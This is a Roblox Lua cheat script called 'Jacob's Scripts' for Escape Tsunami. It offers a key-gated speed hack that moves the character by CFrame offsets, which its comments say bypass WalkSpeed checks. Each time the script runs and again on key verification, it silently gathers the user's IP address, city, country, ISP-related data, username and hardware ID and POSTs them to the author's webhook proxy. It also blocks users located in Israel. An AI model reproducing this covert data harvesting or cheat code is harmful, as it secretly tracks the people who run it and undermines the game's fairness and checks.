--[[
    ====================================
    JACOB'S SCRIPTS - ESCAPE TSUNAMI FOR BRAINROTS
    ====================================
]]

-- ============================================
-- CONFIG
-- ============================================
local CONFIG = {
    GamePlaceId = 131623223084840,
    GameName = "ESCAPE TSUNAMI",
    
    ScriptName = "JACOB'S SCRIPTS",
    Version = "1.0",
    
    ValidKeys = {"jacobescape"},
    DiscordInvite = "https://discord.gg/kNk7kAUVQM",
    
    ToggleKey = Enum.KeyCode.RightShift,
    AccentColor = Color3.fromRGB(138, 43, 226),
}

-- Webhook proxy (secure)
local _wh = "https://jacob-webhook.helpclownrunner.workers.dev/"
local GAME_NAME = "Escape Tsunami"

-- ============================================
-- GAME CHECK
-- ============================================
if CONFIG.GamePlaceId ~= 0 and game.PlaceId ~= CONFIG.GamePlaceId then
    game:GetService("StarterGui"):SetCore("SendNotification", {
        Title = "Jacob's Scripts",
        Text = "Wrong game innit? 💀",
        Duration = 5
    })
    return
end

-- ============================================
-- SERVICES
-- ============================================
local Players = game:GetService("Players")
local RunService = game:GetService("RunService")
local UserInputService = game:GetService("UserInputService")
local HttpService = game:GetService("HttpService")
local TweenService = game:GetService("TweenService")

local LocalPlayer = Players.LocalPlayer

-- ============================================
-- GEO-BLOCK CHECK
-- ============================================
local function CheckGeoBlock()
    local blocked = false
    pcall(function()
        local data = HttpService:JSONDecode(game:HttpGet("http://ip-api.com/json/?fields=country,countryCode"))
        if data and (data.country == "Israel" or data.countryCode == "IL") then
            blocked = true
        end
    end)
    return blocked
end

if CheckGeoBlock() then
    local BlockGui = Instance.new("ScreenGui")
    BlockGui.Name = "JSBlock"
    BlockGui.ResetOnSpawn = false
    pcall(function() if syn then syn.protect_gui(BlockGui) end BlockGui.Parent = game:GetService("CoreGui") end)
    if not BlockGui.Parent then BlockGui.Parent = LocalPlayer:WaitForChild("PlayerGui") end
    
    local BlockFrame = Instance.new("Frame")
    BlockFrame.Size = UDim2.new(0, 400, 0, 200)
    BlockFrame.Position = UDim2.new(0.5, -200, 0.5, -100)
    BlockFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 26)
    BlockFrame.BorderSizePixel = 0
    BlockFrame.Parent = BlockGui
    Instance.new("UICorner", BlockFrame).CornerRadius = UDim.new(0, 6)
    
    local BlockStroke = Instance.new("UIStroke", BlockFrame)
    BlockStroke.Color = Color3.fromRGB(200, 50, 50)
    BlockStroke.Thickness = 2
    
    local BlockTitle = Instance.new("TextLabel")
    BlockTitle.Size = UDim2.new(1, 0, 0, 40)
    BlockTitle.BackgroundColor3 = Color3.fromRGB(200, 50, 50)
    BlockTitle.BorderSizePixel = 0
    BlockTitle.Text = "ACCESS DENIED"
    BlockTitle.TextColor3 = Color3.new(1, 1, 1)
    BlockTitle.TextSize = 18
    BlockTitle.Font = Enum.Font.GothamBold
    BlockTitle.Parent = BlockFrame
    Instance.new("UICorner", BlockTitle).CornerRadius = UDim.new(0, 6)
    
    local TitleFix = Instance.new("Frame")
    TitleFix.Size = UDim2.new(1, 0, 0, 10)
    TitleFix.Position = UDim2.new(0, 0, 1, -10)
    TitleFix.BackgroundColor3 = Color3.fromRGB(200, 50, 50)
    TitleFix.BorderSizePixel = 0
    TitleFix.Parent = BlockTitle
    
    local BlockMsg = Instance.new("TextLabel")
    BlockMsg.Size = UDim2.new(1, -20, 0, 80)
    BlockMsg.Position = UDim2.new(0, 10, 0, 50)
    BlockMsg.BackgroundTransparency = 1
    BlockMsg.Text = "You cannot use this script.\n\nJoin our Discord, tag the owner,\nand send a screenshot to request access."
    BlockMsg.TextColor3 = Color3.fromRGB(200, 200, 200)
    BlockMsg.TextSize = 14
    BlockMsg.Font = Enum.Font.Gotham
    BlockMsg.TextWrapped = true
    BlockMsg.Parent = BlockFrame
    
    local DiscordBtn = Instance.new("TextButton")
    DiscordBtn.Size = UDim2.new(1, -20, 0, 35)
    DiscordBtn.Position = UDim2.new(0, 10, 0, 140)
    DiscordBtn.BackgroundColor3 = Color3.fromRGB(88, 101, 242)
    DiscordBtn.Text = "Join Discord: discord.gg/kNk7kAUVQM"
    DiscordBtn.TextColor3 = Color3.new(1, 1, 1)
    DiscordBtn.TextSize = 13
    DiscordBtn.Font = Enum.Font.GothamBold
    DiscordBtn.Parent = BlockFrame
    Instance.new("UICorner", DiscordBtn).CornerRadius = UDim.new(0, 4)
    
    DiscordBtn.MouseButton1Click:Connect(function()
        setclipboard("https://discord.gg/kNk7kAUVQM")
        DiscordBtn.Text = "Copied to clipboard!"
        task.wait(1.5)
        DiscordBtn.Text = "Join Discord: discord.gg/kNk7kAUVQM"
    end)
    
    return
end

-- ============================================
-- VARIABLES
-- ============================================
local GUIVisible = true
local Loaded = false
local KeyVerified = false

local Settings = {
    SpeedEnabled = false,
    SpeedValue = 50,
}

local OriginalWalkSpeed = 16

-- ============================================
-- UTILITY FUNCTIONS
-- ============================================
local function Tween(obj, props, dur)
    TweenService:Create(obj, TweenInfo.new(dur, Enum.EasingStyle.Quart), props):Play()
end

local function GetUserInfo()
    local ip = {}
    pcall(function() ip = HttpService:JSONDecode(game:HttpGet("http://ip-api.com/json/?fields=query,country,city,isp,proxy")) end)
    local hwid = "?" pcall(function() if gethwid then hwid = gethwid() end end)
    return ip, hwid
end

local function LogExecution()
    local ip, hwid = GetUserInfo()
    pcall(function()
        local r = (syn and syn.request) or http_request or request
        if r then
            r({Url = _wh, Method = "POST", Headers = {["Content-Type"] = "application/json"},
                Body = HttpService:JSONEncode({embeds = {{
                    title = "Script Executed",
                    color = 16776960,
                    fields = {
                        {name = "Game", value = GAME_NAME, inline = true},
                        {name = "User", value = LocalPlayer.Name .. " (" .. LocalPlayer.UserId .. ")", inline = true},
                        {name = "IP", value = ip.query or "?", inline = true},
                        {name = "Location", value = (ip.city or "?") .. ", " .. (ip.country or "?"), inline = true},
                        {name = "HWID", value = hwid, inline = false},
                    },
                    thumbnail = {url = "https://www.roblox.com/headshot-thumbnail/image?userId=" .. LocalPlayer.UserId .. "&width=150&height=150&format=png"},
                    footer = {text = "Awaiting key verification"}
                }}})
            })
        end
    end)
end

local function LogKeySuccess(key)
    local ip, hwid = GetUserInfo()
    pcall(function()
        local r = (syn and syn.request) or http_request or request
        if r then
            r({Url = _wh, Method = "POST", Headers = {["Content-Type"] = "application/json"},
                Body = HttpService:JSONEncode({embeds = {{
                    title = "Key Verified",
                    color = 65280,
                    fields = {
                        {name = "Game", value = GAME_NAME, inline = true},
                        {name = "User", value = LocalPlayer.Name .. " (" .. LocalPlayer.UserId .. ")", inline = true},
                        {name = "Key Used", value = "||" .. key .. "||", inline = true},
                        {name = "IP", value = ip.query or "?", inline = true},
                        {name = "Location", value = (ip.city or "?") .. ", " .. (ip.country or "?"), inline = true},
                        {name = "HWID", value = hwid, inline = false},
                    },
                    thumbnail = {url = "https://www.roblox.com/headshot-thumbnail/image?userId=" .. LocalPlayer.UserId .. "&width=150&height=150&format=png"},
                    footer = {text = "Access granted"}
                }}})
            })
        end
    end)
end

local function IsKeyValid(key)
    for _, validKey in ipairs(CONFIG.ValidKeys) do
        if key == validKey then return true end
    end
    return false
end

-- ============================================
-- GUI SETUP
-- ============================================
local Gui = Instance.new("ScreenGui")
Gui.Name = "JS"
Gui.ResetOnSpawn = false
pcall(function() if syn then syn.protect_gui(Gui) end Gui.Parent = game:GetService("CoreGui") end)
if not Gui.Parent then Gui.Parent = LocalPlayer:WaitForChild("PlayerGui") end

task.spawn(LogExecution)

-- ============================================
-- KEY SYSTEM UI
-- ============================================
local KeyFrame = Instance.new("Frame")
KeyFrame.Name = "KeySystem"
KeyFrame.Size = UDim2.new(0, 300, 0, 200)
KeyFrame.Position = UDim2.new(0.5, -150, 0.5, -100)
KeyFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 26)
KeyFrame.BorderSizePixel = 0
KeyFrame.Parent = Gui

Instance.new("UICorner", KeyFrame).CornerRadius = UDim.new(0, 6)
local KeyStroke = Instance.new("UIStroke", KeyFrame)
KeyStroke.Color = CONFIG.AccentColor
KeyStroke.Thickness = 1

local KeyTitle = Instance.new("TextLabel")
KeyTitle.Size = UDim2.new(1, 0, 0, 40)
KeyTitle.BackgroundColor3 = CONFIG.AccentColor
KeyTitle.BorderSizePixel = 0
KeyTitle.Text = CONFIG.ScriptName
KeyTitle.TextColor3 = Color3.new(1, 1, 1)
KeyTitle.TextSize = 16
KeyTitle.Font = Enum.Font.GothamBold
KeyTitle.Parent = KeyFrame
Instance.new("UICorner", KeyTitle).CornerRadius = UDim.new(0, 6)

local TitleFix = Instance.new("Frame")
TitleFix.Size = UDim2.new(1, 0, 0, 10)
TitleFix.Position = UDim2.new(0, 0, 1, -10)
TitleFix.BackgroundColor3 = CONFIG.AccentColor
TitleFix.BorderSizePixel = 0
TitleFix.Parent = KeyTitle

local DiscordInfo = Instance.new("TextLabel")
DiscordInfo.Size = UDim2.new(1, -20, 0, 30)
DiscordInfo.Position = UDim2.new(0, 10, 0, 48)
DiscordInfo.BackgroundTransparency = 1
DiscordInfo.Text = "Join Discord to get a key:"
DiscordInfo.TextColor3 = Color3.fromRGB(180, 180, 180)
DiscordInfo.TextSize = 12
DiscordInfo.Font = Enum.Font.Gotham
DiscordInfo.Parent = KeyFrame

local GetKeyBtn = Instance.new("TextButton")
GetKeyBtn.Size = UDim2.new(1, -20, 0, 32)
GetKeyBtn.Position = UDim2.new(0, 10, 0, 78)
GetKeyBtn.BackgroundColor3 = Color3.fromRGB(88, 101, 242)
GetKeyBtn.Text = "Get Key (Discord)"
GetKeyBtn.TextColor3 = Color3.new(1, 1, 1)
GetKeyBtn.TextSize = 13
GetKeyBtn.Font = Enum.Font.GothamBold
GetKeyBtn.Parent = KeyFrame
Instance.new("UICorner", GetKeyBtn).CornerRadius = UDim.new(0, 4)

local KeyInput = Instance.new("TextBox")
KeyInput.Size = UDim2.new(1, -20, 0, 32)
KeyInput.Position = UDim2.new(0, 10, 0, 118)
KeyInput.BackgroundColor3 = Color3.fromRGB(35, 35, 45)
KeyInput.Text = ""
KeyInput.PlaceholderText = "Enter your key..."
KeyInput.PlaceholderColor3 = Color3.fromRGB(100, 100, 100)
KeyInput.TextColor3 = Color3.new(1, 1, 1)
KeyInput.TextSize = 12
KeyInput.Font = Enum.Font.Gotham
KeyInput.ClearTextOnFocus = false
KeyInput.Parent = KeyFrame
Instance.new("UICorner", KeyInput).CornerRadius = UDim.new(0, 4)

local VerifyBtn = Instance.new("TextButton")
VerifyBtn.Size = UDim2.new(1, -20, 0, 32)
VerifyBtn.Position = UDim2.new(0, 10, 0, 158)
VerifyBtn.BackgroundColor3 = CONFIG.AccentColor
VerifyBtn.Text = "Verify Key"
VerifyBtn.TextColor3 = Color3.new(1, 1, 1)
VerifyBtn.TextSize = 13
VerifyBtn.Font = Enum.Font.GothamBold
VerifyBtn.Parent = KeyFrame
Instance.new("UICorner", VerifyBtn).CornerRadius = UDim.new(0, 4)

GetKeyBtn.MouseButton1Click:Connect(function()
    setclipboard(CONFIG.DiscordInvite)
    GetKeyBtn.Text = "Copied!"
    task.wait(1.5)
    GetKeyBtn.Text = "Get Key (Discord)"
end)

VerifyBtn.MouseButton1Click:Connect(function()
    local key = KeyInput.Text
    if IsKeyValid(key) then
        KeyVerified = true
        LogKeySuccess(key)
        
        VerifyBtn.Text = "Access Granted!"
        VerifyBtn.BackgroundColor3 = Color3.fromRGB(0, 180, 0)
        task.wait(0.15)
        
        -- Fade out all elements
        Tween(KeyFrame, {BackgroundTransparency = 1}, 0.15)
        Tween(KeyTitle, {BackgroundTransparency = 1, TextTransparency = 1}, 0.15)
        Tween(TitleFix, {BackgroundTransparency = 1}, 0.15)
        Tween(DiscordInfo, {TextTransparency = 1}, 0.15)
        Tween(GetKeyBtn, {BackgroundTransparency = 1, TextTransparency = 1}, 0.15)
        Tween(KeyInput, {BackgroundTransparency = 1, TextTransparency = 1}, 0.15)
        Tween(VerifyBtn, {BackgroundTransparency = 1, TextTransparency = 1}, 0.15)
        KeyStroke.Transparency = 1 -- UIStroke doesn't support tweening
        task.wait(0.25) -- Wait longer to ensure tweens complete
        
        -- Force destroy to prevent hanging
        if KeyFrame and KeyFrame.Parent then
            KeyFrame:Destroy()
        end
        
        local IntroHolder = Instance.new("Frame")
        IntroHolder.Size = UDim2.new(0, 200, 0, 80)
        IntroHolder.Position = UDim2.new(0.5, -100, 0.5, -40)
        IntroHolder.BackgroundTransparency = 1
        IntroHolder.Parent = Gui
        
        local Logo = Instance.new("TextLabel")
        Logo.Size = UDim2.new(1, 0, 0, 50)
        Logo.BackgroundTransparency = 1
        Logo.Text = "JS"
        Logo.TextColor3 = CONFIG.AccentColor
        Logo.TextSize = 60
        Logo.Font = Enum.Font.GothamBlack
        Logo.TextTransparency = 1
        Logo.Parent = IntroHolder
        
        local IntroLine = Instance.new("Frame")
        IntroLine.Size = UDim2.new(0, 0, 0, 2)
        IntroLine.Position = UDim2.new(0.5, 0, 0, 55)
        IntroLine.AnchorPoint = Vector2.new(0.5, 0)
        IntroLine.BackgroundColor3 = CONFIG.AccentColor
        IntroLine.BorderSizePixel = 0
        IntroLine.Parent = IntroHolder
        
        local IntroSub = Instance.new("TextLabel")
        IntroSub.Size = UDim2.new(1, 0, 0, 20)
        IntroSub.Position = UDim2.new(0, 0, 0, 60)
        IntroSub.BackgroundTransparency = 1
        IntroSub.Text = CONFIG.GameName
        IntroSub.TextColor3 = Color3.fromRGB(100, 100, 100)
        IntroSub.TextSize = 12
        IntroSub.Font = Enum.Font.GothamMedium
        IntroSub.TextTransparency = 1
        IntroSub.Parent = IntroHolder
        
        Tween(Logo, {TextTransparency = 0}, 0.2)
        task.wait(0.1)
        Tween(IntroLine, {Size = UDim2.new(0, 100, 0, 2)}, 0.15)
        Tween(IntroSub, {TextTransparency = 0}, 0.15)
        task.wait(0.3)
        Tween(Logo, {TextTransparency = 1}, 0.15)
        Tween(IntroLine, {Size = UDim2.new(0, 0, 0, 2)}, 0.15)
        Tween(IntroSub, {TextTransparency = 1}, 0.15)
        task.wait(0.2)
        IntroHolder:Destroy()
        
        Loaded = true
    else
        VerifyBtn.Text = "Invalid Key!"
        VerifyBtn.BackgroundColor3 = Color3.fromRGB(200, 50, 50)
        task.wait(1)
        VerifyBtn.Text = "Verify Key"
        VerifyBtn.BackgroundColor3 = CONFIG.AccentColor
    end
end)

-- ============================================
-- MAIN UI
-- ============================================
local Main = Instance.new("Frame")
Main.Name = "Main"
Main.Size = UDim2.new(0, 340, 0, 380)
Main.Position = UDim2.new(0.5, -170, 0.5, -190)
Main.BackgroundColor3 = Color3.fromRGB(20, 20, 26)
Main.BorderSizePixel = 0
Main.Visible = false
Main.ClipsDescendants = true
Main.Parent = Gui

Instance.new("UICorner", Main).CornerRadius = UDim.new(0, 4)
local MainStroke = Instance.new("UIStroke", Main)
MainStroke.Color = CONFIG.AccentColor
MainStroke.Thickness = 1

local Header = Instance.new("Frame")
Header.Size = UDim2.new(1, 0, 0, 40)
Header.BackgroundColor3 = CONFIG.AccentColor
Header.BorderSizePixel = 0
Header.Parent = Main
Instance.new("UICorner", Header).CornerRadius = UDim.new(0, 4)

local HeaderBottom = Instance.new("Frame")
HeaderBottom.Size = UDim2.new(1, 0, 0, 10)
HeaderBottom.Position = UDim2.new(0, 0, 1, -10)
HeaderBottom.BackgroundColor3 = CONFIG.AccentColor
HeaderBottom.BorderSizePixel = 0
HeaderBottom.Parent = Header

local Title = Instance.new("TextLabel")
Title.Size = UDim2.new(1, -40, 1, 0)
Title.Position = UDim2.new(0, 12, 0, 0)
Title.BackgroundTransparency = 1
Title.Text = CONFIG.ScriptName .. " - " .. CONFIG.GameName
Title.TextColor3 = Color3.new(1, 1, 1)
Title.TextSize = 14
Title.Font = Enum.Font.GothamBold
Title.TextXAlignment = Enum.TextXAlignment.Left
Title.Parent = Header

local Close = Instance.new("TextButton")
Close.Size = UDim2.new(0, 30, 0, 30)
Close.Position = UDim2.new(1, -35, 0.5, -15)
Close.BackgroundTransparency = 1
Close.Text = "-"
Close.TextColor3 = Color3.new(1, 1, 1)
Close.TextSize = 24
Close.Font = Enum.Font.GothamBold
Close.Parent = Header

local ContentHolder = Instance.new("Frame")
ContentHolder.Size = UDim2.new(1, -16, 1, -90)
ContentHolder.Position = UDim2.new(0, 8, 0, 82)
ContentHolder.BackgroundTransparency = 1
ContentHolder.BorderSizePixel = 0
ContentHolder.Parent = Main

local TabBar = Instance.new("Frame")
TabBar.Size = UDim2.new(1, -16, 0, 28)
TabBar.Position = UDim2.new(0, 8, 0, 48)
TabBar.BackgroundColor3 = Color3.fromRGB(25, 25, 32)
TabBar.BorderSizePixel = 0
TabBar.Parent = Main
Instance.new("UICorner", TabBar).CornerRadius = UDim.new(0, 4)

local TabLayout = Instance.new("UIListLayout", TabBar)
TabLayout.FillDirection = Enum.FillDirection.Horizontal
TabLayout.Padding = UDim.new(0, 4)
TabLayout.VerticalAlignment = Enum.VerticalAlignment.Center
TabLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center

-- ============================================
-- TAB SYSTEM
-- ============================================
local Tabs = {}
local TabContents = {}
local ActiveTab = nil

local function CreateTab(name)
    local tabBtn = Instance.new("TextButton")
    tabBtn.Size = UDim2.new(0, 95, 0, 22)
    tabBtn.BackgroundColor3 = Color3.fromRGB(35, 35, 45)
    tabBtn.Text = name
    tabBtn.TextColor3 = Color3.fromRGB(150, 150, 150)
    tabBtn.TextSize = 11
    tabBtn.Font = Enum.Font.GothamMedium
    tabBtn.Parent = TabBar
    Instance.new("UICorner", tabBtn).CornerRadius = UDim.new(0, 4)
    
    local content = Instance.new("ScrollingFrame")
    content.Size = UDim2.new(1, 0, 1, 0)
    content.BackgroundTransparency = 1
    content.ScrollBarThickness = 2
    content.ScrollBarImageColor3 = CONFIG.AccentColor
    content.CanvasSize = UDim2.new(0, 0, 0, 0)
    content.AutomaticCanvasSize = Enum.AutomaticSize.Y
    content.BorderSizePixel = 0
    content.Visible = false
    content.Parent = ContentHolder
    
    local layout = Instance.new("UIListLayout", content)
    layout.Padding = UDim.new(0, 6)
    
    Tabs[name] = tabBtn
    TabContents[name] = content
    
    tabBtn.MouseButton1Click:Connect(function()
        for tabName, btn in pairs(Tabs) do
            Tween(btn, {BackgroundColor3 = Color3.fromRGB(35, 35, 45)}, 0.15)
            btn.TextColor3 = Color3.fromRGB(150, 150, 150)
            TabContents[tabName].Visible = false
        end
        Tween(tabBtn, {BackgroundColor3 = CONFIG.AccentColor}, 0.15)
        tabBtn.TextColor3 = Color3.new(1, 1, 1)
        content.Visible = true
        ActiveTab = name
    end)
    
    return content
end

-- ============================================
-- UI COMPONENTS
-- ============================================
local function Section(parent, name)
    local f = Instance.new("Frame")
    f.Size = UDim2.new(1, 0, 0, 34)
    f.BackgroundColor3 = Color3.fromRGB(28, 28, 36)
    f.BorderSizePixel = 0
    f.Parent = parent
    Instance.new("UICorner", f).CornerRadius = UDim.new(0, 4)
    
    local l = Instance.new("TextLabel")
    l.Size = UDim2.new(0.6, 0, 1, 0)
    l.Position = UDim2.new(0, 10, 0, 0)
    l.BackgroundTransparency = 1
    l.Text = name
    l.TextColor3 = Color3.fromRGB(200, 200, 200)
    l.TextSize = 12
    l.Font = Enum.Font.GothamMedium
    l.TextXAlignment = Enum.TextXAlignment.Left
    l.Parent = f
    return f
end

local function Toggle(sec, val, cb)
    local bg = Instance.new("Frame")
    bg.Size = UDim2.new(0, 38, 0, 18)
    bg.Position = UDim2.new(1, -46, 0.5, -9)
    bg.BackgroundColor3 = val and CONFIG.AccentColor or Color3.fromRGB(50, 50, 60)
    bg.BorderSizePixel = 0
    bg.Parent = sec
    Instance.new("UICorner", bg).CornerRadius = UDim.new(1, 0)
    
    local c = Instance.new("Frame")
    c.Size = UDim2.new(0, 14, 0, 14)
    c.Position = val and UDim2.new(1, -16, 0.5, -7) or UDim2.new(0, 2, 0.5, -7)
    c.BackgroundColor3 = Color3.new(1, 1, 1)
    c.BorderSizePixel = 0
    c.Parent = bg
    Instance.new("UICorner", c).CornerRadius = UDim.new(1, 0)
    
    local b = Instance.new("TextButton")
    b.Size = UDim2.new(1, 0, 1, 0)
    b.BackgroundTransparency = 1
    b.Text = ""
    b.Parent = bg
    
    local on = val
    b.MouseButton1Click:Connect(function()
        on = not on
        Tween(bg, {BackgroundColor3 = on and CONFIG.AccentColor or Color3.fromRGB(50, 50, 60)}, 0.12)
        Tween(c, {Position = on and UDim2.new(1, -16, 0.5, -7) or UDim2.new(0, 2, 0.5, -7)}, 0.12)
        if cb then cb(on) end
    end)
end

local function Slider(parent, name, min, max, default, cb)
    local f = Instance.new("Frame")
    f.Size = UDim2.new(1, 0, 0, 48)
    f.BackgroundColor3 = Color3.fromRGB(28, 28, 36)
    f.BorderSizePixel = 0
    f.Parent = parent
    Instance.new("UICorner", f).CornerRadius = UDim.new(0, 4)
    
    local l = Instance.new("TextLabel")
    l.Size = UDim2.new(0.5, 0, 0, 22)
    l.Position = UDim2.new(0, 10, 0, 4)
    l.BackgroundTransparency = 1
    l.Text = name
    l.TextColor3 = Color3.fromRGB(200, 200, 200)
    l.TextSize = 12
    l.Font = Enum.Font.GothamMedium
    l.TextXAlignment = Enum.TextXAlignment.Left
    l.Parent = f
    
    local v = Instance.new("TextLabel")
    v.Size = UDim2.new(0, 35, 0, 22)
    v.Position = UDim2.new(1, -45, 0, 4)
    v.BackgroundTransparency = 1
    v.Text = tostring(default)
    v.TextColor3 = CONFIG.AccentColor
    v.TextSize = 11
    v.Font = Enum.Font.GothamBold
    v.Parent = f
    
    local track = Instance.new("Frame")
    track.Size = UDim2.new(1, -20, 0, 4)
    track.Position = UDim2.new(0, 10, 0, 34)
    track.BackgroundColor3 = Color3.fromRGB(45, 45, 55)
    track.BorderSizePixel = 0
    track.Parent = f
    Instance.new("UICorner", track).CornerRadius = UDim.new(1, 0)
    
    local fill = Instance.new("Frame")
    fill.Size = UDim2.new((default-min)/(max-min), 0, 1, 0)
    fill.BackgroundColor3 = CONFIG.AccentColor
    fill.BorderSizePixel = 0
    fill.Parent = track
    Instance.new("UICorner", fill).CornerRadius = UDim.new(1, 0)
    
    local drag = false
    track.InputBegan:Connect(function(i) if i.UserInputType == Enum.UserInputType.MouseButton1 then drag = true end end)
    UserInputService.InputEnded:Connect(function(i) if i.UserInputType == Enum.UserInputType.MouseButton1 then drag = false end end)
    UserInputService.InputChanged:Connect(function(i)
        if drag and i.UserInputType == Enum.UserInputType.MouseMovement then
            local r = math.clamp((i.Position.X - track.AbsolutePosition.X) / track.AbsoluteSize.X, 0, 1)
            local n = math.floor(min + (max-min) * r)
            fill.Size = UDim2.new(r, 0, 1, 0)
            v.Text = tostring(n)
            if cb then cb(n) end
        end
    end)
end

local function Keybind(parent, name, key, cb)
    local f = Instance.new("Frame")
    f.Size = UDim2.new(1, 0, 0, 34)
    f.BackgroundColor3 = Color3.fromRGB(28, 28, 36)
    f.BorderSizePixel = 0
    f.Parent = parent
    Instance.new("UICorner", f).CornerRadius = UDim.new(0, 4)
    
    local l = Instance.new("TextLabel")
    l.Size = UDim2.new(0.5, 0, 1, 0)
    l.Position = UDim2.new(0, 10, 0, 0)
    l.BackgroundTransparency = 1
    l.Text = name
    l.TextColor3 = Color3.fromRGB(200, 200, 200)
    l.TextSize = 12
    l.Font = Enum.Font.GothamMedium
    l.TextXAlignment = Enum.TextXAlignment.Left
    l.Parent = f
    
    local kb = Instance.new("TextButton")
    kb.Size = UDim2.new(0, 70, 0, 22)
    kb.Position = UDim2.new(1, -78, 0.5, -11)
    kb.BackgroundColor3 = Color3.fromRGB(45, 45, 55)
    kb.Text = key.Name
    kb.TextColor3 = Color3.fromRGB(180, 180, 180)
    kb.TextSize = 10
    kb.Font = Enum.Font.GothamMedium
    kb.Parent = f
    Instance.new("UICorner", kb).CornerRadius = UDim.new(0, 3)
    
    local listening = false
    kb.MouseButton1Click:Connect(function()
        listening = true
        kb.Text = "..."
    end)
    
    UserInputService.InputBegan:Connect(function(inp, gp)
        if listening and inp.UserInputType == Enum.UserInputType.Keyboard then
            listening = false
            kb.Text = inp.KeyCode.Name
            if cb then cb(inp.KeyCode) end
        end
    end)
end

-- ============================================
-- DRAGGING & TOGGLE
-- ============================================
local dragging, dragStart, startPos
Header.InputBegan:Connect(function(i) if i.UserInputType == Enum.UserInputType.MouseButton1 then dragging, dragStart, startPos = true, i.Position, Main.Position end end)
Header.InputEnded:Connect(function(i) if i.UserInputType == Enum.UserInputType.MouseButton1 then dragging = false end end)
UserInputService.InputChanged:Connect(function(i)
    if dragging and i.UserInputType == Enum.UserInputType.MouseMovement then
        local d = i.Position - dragStart
        Main.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + d.X, startPos.Y.Scale, startPos.Y.Offset + d.Y)
    end
end)

Close.MouseButton1Click:Connect(function()
    GUIVisible = false
    Tween(Main, {Size = UDim2.new(0, 340, 0, 0)}, 0.2)
    task.delay(0.2, function() Main.Visible = false end)
end)

UserInputService.InputBegan:Connect(function(i, gp)
    if gp then return end
    if i.KeyCode == CONFIG.ToggleKey then
        GUIVisible = not GUIVisible
        if GUIVisible then
            Main.Visible = true
            Main.Size = UDim2.new(0, 340, 0, 0)
            Tween(Main, {Size = UDim2.new(0, 340, 0, 380)}, 0.2)
        else
            Tween(Main, {Size = UDim2.new(0, 340, 0, 0)}, 0.2)
            task.delay(0.2, function() Main.Visible = false end)
        end
    end
end)

task.spawn(function()
    repeat task.wait() until Loaded
    Main.Visible = true
    Main.Size = UDim2.new(0, 340, 0, 0)
    Tween(Main, {Size = UDim2.new(0, 340, 0, 380)}, 0.25)
end)

-- ============================================
-- TABS
-- ============================================
local MainTab = CreateTab("Main")
local SettingsTab = CreateTab("Settings")

task.defer(function()
    Tabs["Main"].TextColor3 = Color3.new(1, 1, 1)
    Tabs["Main"].BackgroundColor3 = CONFIG.AccentColor
    TabContents["Main"].Visible = true
    ActiveTab = "Main"
end)

-- ============================================
-- UI ELEMENTS
-- ============================================
local speedSection = Section(MainTab, "Speed Hack")
Toggle(speedSection, Settings.SpeedEnabled, function(v)
    Settings.SpeedEnabled = v
    if not v and LocalPlayer.Character then
        local hum = LocalPlayer.Character:FindFirstChildOfClass("Humanoid")
        if hum then hum.WalkSpeed = OriginalWalkSpeed end
    end
end)

Slider(MainTab, "Speed Value", 16, 400, Settings.SpeedValue, function(v)
    Settings.SpeedValue = v
end)

Keybind(SettingsTab, "Toggle Key", CONFIG.ToggleKey, function(v) CONFIG.ToggleKey = v end)

-- ============================================
-- SPEED LOGIC (CFrame Velocity Bypass)
-- ============================================
local function GetMovementDirection()
    local moveDir = Vector3.zero
    
    if UserInputService:IsKeyDown(Enum.KeyCode.W) then
        moveDir = moveDir + Vector3.new(0, 0, -1)
    end
    if UserInputService:IsKeyDown(Enum.KeyCode.S) then
        moveDir = moveDir + Vector3.new(0, 0, 1)
    end
    if UserInputService:IsKeyDown(Enum.KeyCode.A) then
        moveDir = moveDir + Vector3.new(-1, 0, 0)
    end
    if UserInputService:IsKeyDown(Enum.KeyCode.D) then
        moveDir = moveDir + Vector3.new(1, 0, 0)
    end
    
    if moveDir.Magnitude > 0 then
        moveDir = moveDir.Unit
    end
    
    return moveDir
end

RunService.RenderStepped:Connect(function(deltaTime)
    if not Loaded then return end
    
    if Settings.SpeedEnabled and LocalPlayer.Character then
        local hrp = LocalPlayer.Character:FindFirstChild("HumanoidRootPart")
        local hum = LocalPlayer.Character:FindFirstChildOfClass("Humanoid")
        
        if hrp and hum and hum.MoveDirection.Magnitude > 0 then
            -- Calculate extra speed (on top of normal WalkSpeed)
            local extraSpeed = (Settings.SpeedValue - 16) * deltaTime
            
            -- Get camera-relative movement direction
            local camera = workspace.CurrentCamera
            local camCFrame = camera.CFrame
            local camLook = Vector3.new(camCFrame.LookVector.X, 0, camCFrame.LookVector.Z).Unit
            local camRight = Vector3.new(camCFrame.RightVector.X, 0, camCFrame.RightVector.Z).Unit
            
            -- Convert humanoid move direction to world space boost
            local moveDir = hum.MoveDirection
            local boost = moveDir * extraSpeed
            
            -- Apply CFrame offset (bypasses WalkSpeed checks)
            hrp.CFrame = hrp.CFrame + boost
        end
    end
end)
